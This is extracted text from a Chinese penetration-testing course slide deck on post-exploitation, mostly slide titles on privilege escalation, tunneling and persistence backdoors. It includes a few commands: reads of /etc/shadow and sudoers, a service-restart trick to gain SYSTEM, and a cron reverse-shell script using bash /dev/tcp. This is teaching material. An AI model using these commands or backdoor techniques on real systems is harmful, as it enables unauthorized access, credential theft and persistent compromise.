渗透测试技术 课件 第6章-6.3-后渗透测试实践.pptx

后渗透测试实践;在拿到了一系列系统的访问权限或者webshell后，接下来就进入一个很重要的阶段，即后渗透测试阶段。在汇报渗透测试结果时，客户更想得到的成果是本次渗透能够影响目标公司业务运行的战利品，而不仅仅是一系列系统的访问权限，所以需要通过后渗透测试阶段扩大战果。;权限提升;Windows令牌窃取 ;Windows令牌窃取;Windows令牌窃取;Windows配置错误提权 ;Windows配置错误提权;上传文件至C:\phpstudy pro\并重命名为phpstudy.exe，等待服务重启 或者手动重启服务 sc stop phpStudySrv sc start phpStudySrv 可以看到权限是system ;Windows不安全的注册表权限配置;Windows不安全的注册表权限配置;Windows不安全的注册表权限配置;Windows bypassuac;Windows bypassuac;Windows bypassuac;Linux Suid提权 ;Linux SUDO提权;Linux内核提权;Linux内核提权 ;Linux内核提权 ;Linux内核提权;Linux 内核提权 ;权限提升;信息收集;Windows权限管理;Windows权限管理;Windows权限管理;Windows权限管理;Windows权限管理;信息收集常用命令;linux内核、操作系统版本 ;linux环境变量信息 ;linux服务进程 ;linux计划任务 ;linux敏感文件 ;cat /etc/passwd cat /etc/group cat /etc/shadow ls -alh /var/mail/ id who cat /etc/passwd | cut -d: -f1 # List of users grep -v -E ^# /etc/passwd | awk -Fa: $3 == 0 { print $1} cat /etc/sudoers sudo -l;linux网络信息 ;msf中主要的获取信息模块：;权限提升;横向渗透;什么是代理 ;代理请求过程;正向代理;正向代理的适用场景 ;反向代理 ;反向代理的适用场景 ;正向代理与反向代理的区别 ;端口转发 ;端口映射 ;端口映射与转发的区别;端口转发之LCX;端口转发之portmap;端口映射（本地端口转发）之LCX.EXE;常用隧道分类;SSH通道;SSH端口转发 ;SSH socks代理;基于http的转发与socket代理;基于http的转发与socket代理;EarthWorm工具;EarthWorm工具;EarthWorm工具;MSF开启代理隧道实例;MSF开启代理隧道实例 ;MSF开启代理隧道实例 ;MSF开启代理隧道实例;MSF开启代理隧道实例;MSF开启代理隧道实例;MSF开启代理隧道实例 ;横向渗透;横向渗透;权限提升;Windows后门持久化;Windows隐藏文件夹及文件;Windows隐藏文件夹及文件;Windows隐藏文件夹及文件;Windows隐藏文件夹及文件;Windows系统隐藏??户;Windows系统隐藏账户;Windows系统隐藏账户;Windows系统隐藏账户;Windows系统隐藏账户;Windows映像劫持;Windows映像劫持;Windows映像劫持;Windows映像劫持;Windows映像劫持;Windows映像劫持;Windows开始菜单启动项;Windows计划任务后门;Windows自启动服务后门;Windows文件关联;Windows文件关联;linux隐藏文件及文件夹;linux添加普通用户;linux一句话添加root用户;linux隐身登录;linux ssh公钥登陆 ;linux ssh公钥登陆;linux ssh公钥登陆;linux软链接后门;linux软链接后门 ;1.记录原来的版本号：ssh –V 2.下载对应版本或版本略高一点 /ubuntu/+source/openssh /pkg/openssh /pub/OpenBSD/OpenSSH/portable/ 3.修改源码(sshconnect2.c/auth-passwd.c/monitor.c);linux openssh后门;linux openssh后门;linux openssh后门;linux openssh后门;linux SUID后门;linux cron后门;1.准备反弹脚本test.sh #!/bin/bash bash -i /dev/tcp/31/8899 01 赋予执行权限：chmod +sx test.sh;受影响版本：Vim 8.1.1365, Neovim 0.3.6;linux ICMP后门;R